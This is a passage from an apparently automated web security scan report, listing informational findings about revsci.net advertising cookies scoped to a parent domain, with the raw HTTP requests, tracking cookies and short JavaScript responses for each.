HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJEOhuQIMl594t637QLtKTShEEKPJgKWhVTM46g7k86fOUpoPyGpQqGmcAHhFlCRHJGrM+4CmMoLwQLoTCqr3r5XW6u03GkRNJjXLei6plrNgyTAAsKikEDJN/pB8U+M+b3xP8ojR3+OZiCn0i2H77rUVjAauYFVUKFcsYrxeWij6nJgx3+Gf1WrB8lgxYfycBUfr+CXUks1meFbpP4az8/adW8e49o2vd1ny0p4awJ64X0qjMWasPQO0EJBML5McgVuwLcgO6T5+9Nlp1mTNSdYYZBGGmwu8b5LKBMMmLdsD3BytbCGmRwoYJXospn2+QD5OY3P63/qDVLCvOIi9f3QBnZ+mHYyYVcngr+NnGKxjmjMvhro31bsmykCXUEuEgK1HseeR9BjchOMl6eN6J1A67kb9UDRgZ0j1gYja1H29543tuAXbNSRPV8z+qvXkRxwH+thAuFL3oQkGd6o7UHM40i6g5gjPpGzkICQ6X/a6ftJ3kQWadfhcierQ3j1ZFK11BQtk1eaIciNu35/SMCnk+27YhTfShegD4cH961OlnmdDbHYFIhT8n08zlVRclWf901wWSDLYIr/mEr3o0mJoTh3rUErWzu3HXRvpemu6RBDsGcUcVGcv5hUjDSWIjbJZ/pJrkdAaCRetuood49LBYp0w; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:14:58 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:14:58 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/572738137.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhKRGZKRTjLTQMJBSE/72npTsNpRoMWq+9TTgWL2ZvvxerT8SkTMMg3mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTnO7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSmYQE/BtirGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9duyBWNNA=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:04:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/572738137.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_yVM8="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEldrjeS1G/vIp6ySjPkBdccmYgL3fXtGYjtf+9ijAdBnYl514E3B7Drsf4As6hj1VY7tYYI6TxN/HCVaNjNGzNcL138URzpAgB5mAMU+AJ1de9w5vygLgxmTFvCCP3Ncx8boRMglw60VJ/mkG9qIA7utoDoqNJWO7LxTZFgBwbPp/3SViJq95BYxotjhA10z1HAImqCrUFGw++3T9no5K1EbM+mENPze81p8Tin7go+7O/cRWD0BNrvUZobxHQGbjFT4VEahkZEmbmWBcMzCA79S76VaVXyItYuTjdjuVbao8UplaR+YZPZ1lDx+fSVpQyauQe3u0yS8yYCfC0eKDJ9crlZU4UN0a8BvlhYA9+yVEbyDAT8FYMOmgyjEZO9onFKuIOrDNhzWl8FqX71Enwk88R8PLlSGpxjTpo9K18VJouskAFjqZz5m4ytliGXsKxgLDpbezF9zVyNRHU/W1TxW5+nMZpQnDiJRK1/hLcYFYsrXCyiK943c06XaLIzEAnmoo1zCbisep6HNzbr/IOpzQnFrfoeMizRnnIIq9fta2xVGlWO8R9VBWQbyeNxgxwGiaEBtKDGpwuZ4K346fAfXW1SBzKbtPNnOiq9YNzHY52Vb/UVpgoXtQzHaPjF8w2/OGieBzfGYcmF/LibFWYVm4HVMaKIaHp5mwyE8n67R9cySPuXsNgUvI5nyVMlydchgGNkCj4I+7zi/yYANCLmCVctJOdOi4WzzpUvvxawGUV3tlmvVbXuMm7kpisi4nhzHoYd5uDz8E5fQDplVlyW2BPdbHAlQOAcM7WeFXLjxzZOyz4hNM/6SbhzanE4qgrRguqwV/LUGp4krUhR2UGf7M9VXYf40M4yF69bx+bsTeOVRHKzR0Aiey1u6qlwijgo4cETQ7sMFZnRTQ9BHUw8ay19BgVtTtoA1lIKLTT9xsVQRzlBEXeMvR6fYcQTFtaoN5aVLwwDhuVGhzan/htoVD03kC2JEACv5YlFk6yskc9Yf4pdgm4djTKZP0DsNckxEXmEUPmCr4AWsuscbmHStm77HEQLvGokIsREslulzNgMkkHIOhK0sfmoGpEUWULW2kfR7uEefFxJalE6i9BKwn4cTzBCXhxsDIaZgeWTZGVOB0UVJ7YdZvwCQ+ZbiUy8yrq9UaeZcH4DF5j7qpquEdbB72qaKIpmwg8WnR87Xr+BAF1MmJf9UA86Ka4O/iAd0zTP8X3MijPRENo7n2JmyPIrCKsTtU/iZlCWrq1E1k9rESFQy0r0B27EMTPI/siO+YomRIMfQuhK/xf9x7gByeWYp0zwtI="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6pfcnyiRh34yc/Lp3I/C0yVa3lhISIET3DrXjNppl/pEoNPvfI3vcjinQPwCvSfZ3AzYxm0B46Xf51wRLqXjsjHtiMYCum8fAi0Md67GPTKhBYdQMtcWmZ9mmoM3pUBMBLMvCKFJz2fzoe95N9cDHHyciFups/NYIh8CIzxhfdpulXJD7jp+g2EzGPFe+Vn0Wa7GjOha2loDqwjvmekncJzWXciw48hr2uYGiej5Vm1P3OWZTtYC42bE5AudfiMPXOGaGko9RunC/sgnulIKvCbA8pu658l5BrwyC9/9NBSf85RMsvT4IbxQ2ok0fplAi/9GmZyk1pvvB2muooyyNzUx2Be1eokgwS11WEHX05ZPI6M4n1GP4x/2tN9hRDVswbZT4HeErlhaonT9XSXNlTfI03lgtVIhceY2l0L17ce5sP98EG1uT2d/LWpcZdIfP59Fnt1KuHmz4ac0JCzRE9hJAyLfUiRH6eEiv8xB/AT+u9ividjAcx7tiRR95MZUe2NLnrKR6qIkEE/WP6HYU+bOa6PzpSNqFFNUKKW2dqDEVMZinKhzdVIEZ5n81mrKFskOY7o/c3TqxLlSRLQNIxPUl69fUoSJuWmc5bzAdobHrJ0YTEVcopTGz7jFJ0wIZHzJiMekt7NnOgsgC7g21KeZWQq4pWcsf7B1MHiy02Gm+OjogUYbrLYQNvWU2dlZsHENPgBQ4/CjJhGzacW8mGb57HXKInWZGIAhUPKN+0BQHzjCECuPs/+eC7wI/VWqyNsbbk+EQ5TOX9cHP1dxBJQ54UPhPF4Ap6HSeHV/jgd7u5qBAAXBQK8H1p3Z7cJDHRop+iIRpKaRshrN/HixA7M6TkZCMUYSqrsfblj2g+LwbSRohOIHZkec1fghYIWOvHPtdzQgymDNjO/LWn2jSoBvengATfrNfGS9nwJd6U505Kt2QcpCP3+YCL7DaNTAkwJ3j2UnrXCWh84sWL7GPl9BErMzcF19XpL0bP7oa9xw/+areqQLrfIHNaEHDWC/IpCvCY8HNxkqymONGlO2BGaryGiLmLWiq2EV4Bxh2O6KMhHInF9NBW+fl1F9Q33GEHcceIHknOXGMMaIpV4gOD1Rv369Oj2Wv/caan33m+x4x7B95wN2N+4OQM8N7+QBAQvYSoyIaQsSjShlzTCwU2O8/5kIVVAc2VwPPaC0h45dBLHTo7+Fz7B8HeW6gk2WMVQ5FUPr+1ID4w764gi7wb1Q+2OYLiw5Xbqe9hlohwYJcgV0ZfCL2gQNsFjH3WQfYkxkqUXaRhwJr/INYEsjV+T1qq5DuBw+NuEBlRCAt4jQxEwQdMfwb8GAtJwtaLUfUY0Bei+KjqoqNyvXhnz6hCdy4qgBJ1RRax3hu1jfMpkZ5n74PYbm0+nstnYnjnLIxOn98tvLXknQ/nR19CtYlibliAnYkhrafEGLcO2BUqau8wYIyDEciGGNKk6gTSl8cRlLBRbZDCyPJIxBBfovlaeR0THs+wofPI1XgQ3QXiaCzgJpGYqOkoqkUYd+qe+DmFq4Duw/3npUlqpHKWTgJAE4J4h0Hta4gOZf4gMqXvHAvgVOEqGjrLnDEReskdi9UAIy81QrEuRjRzF8jdTLKXnCdvDBkdgZ+RZBRSGPhiD4z9Iw1rBXK1g+LeXM52ZUBGA3JSq3TJox4PqEn3YtaF5lt8/YN/3zTd2jtGWKAqPnNomtjJ7kd5s6illLNHOnicJU19ysH2/WU9Lk"; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GhnEKDb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+eBC86WjHf9zGKgiUktukRMj4LRehjFmz1e4UegjlR3ikIXFyvg4A+VMpnkBbglt0t580WsqUXr8/ew1tpIyWnlOqrh+81j7eNGltUTNgCz8lauwcvYnjSyCO8GAxzQtVTcm9SvUve7eYddir8wS/yBpgSxpWF0nsIT7UCGnNgRzHx7EkRqUSp6dfZ43Bam+j5dFVp3j+OVK6mRztF9+3qNd0fwLSobj39hOpsGmd9PBCS4PKndeOCW88JZYzjl9D3ogMjd3mXexqK6MMY+ki24Tdz5tqDiceVMfFYfc+u2rk0Il1KqD+3XIpCe+JLIfuMc5RlTlpRSJ1Ys/hHHQohgBQrsq9n6joiNR3KwOinTncIW8g0RL9xvD8qv/eMYpfFaiQVmCoivEkN9X1DUpPncg/PM1DNzqrhXMn2NJii6g37rOAvXbpwiE6c5Q8i7NNc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhKRGZKRTjLTQMJBSE/72npTsNpRoMWq+9TTgWL2ZvvxerT8SkTMMg3mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTnO7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSmYQE/BtirGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9duyBWNNA=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:04:36 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:04:36 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/579855884.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EmhOHMQDruItGF29/x0GEv1FuZbSAKOIGTN8cJSum2Np/CoReJg2v9kDss6IjPbyobQAwvhLAH2SBYVS4Aca2ROPVNOf1VWh+hEqPiqU0bhReIUafnkll3Rq9pruA1HphVsEataiCU4UsktlzVfsKcjSNKUW1ejPUGnrIUMmJ/opL+XBEJqalRFxzz++kuS0r8FA3xbmxB0VW/Fj5TEabsOCs6WjLf8zGKgiUktukxMj4LRehj9yYi7ERIGSj2wgMLjYe9onk6Nwnq1w3cSQz3lezvtsbXogCw5eLcQk7BBWC7AW34FiS6I5I3AMgwXW1+vQct44E8GL/+uZkCF26JWxr4OFg1zCE1hL+og3Ccye+ofAbs5lQhLD9O83gErv0udsw/ULLAXaFrXjIiO+lA4jXrT+Ql6y65lgdTwb7TYQTBMO7cEQ8+JtiHkjuNuCqQrJrA3t1Ab11SQmEzmh1+QCx6igOMxs2lVuCTKOpLCvXWusFMASdzNqMIm1KLwwD840D4c7y3Rshr5o/BgIwNLJUAZ52Q2cRjtmFe+Zr6mqja6lLLnOAJfc5T253oyAq1j4VvExFVkpa4M3kMBXazOIbOJwTO0rd2IVV+hddDV35gc+cnDCJZgSt6tge7B7qFfWLJUvsHU7uuprAFoFQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:01:30 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/579855884.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; 